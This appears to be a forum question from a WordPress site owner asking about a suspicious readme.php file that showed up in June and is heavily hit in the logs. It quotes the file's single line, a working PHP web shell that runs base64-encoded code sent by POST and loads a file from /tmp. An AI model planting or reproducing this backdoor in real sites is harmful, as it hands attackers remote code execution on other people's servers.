On a wordpress site, I checked past backups and there was no readme.php file. In June, one suddenly appeared and there are a lot of accesses to that file according to my log file.
Here is what is in the file:
<? @eval(base64_decode($_POST['evl']));@require_once('/tmp/sessionbroker.php'); ?>
Any idea what this file is doing, and why its one of the most hit files according to my log file?
When I access it, I just get a blank page.
Maybe a coincidence, but the day after this appeared my traffic dropped substantially on google.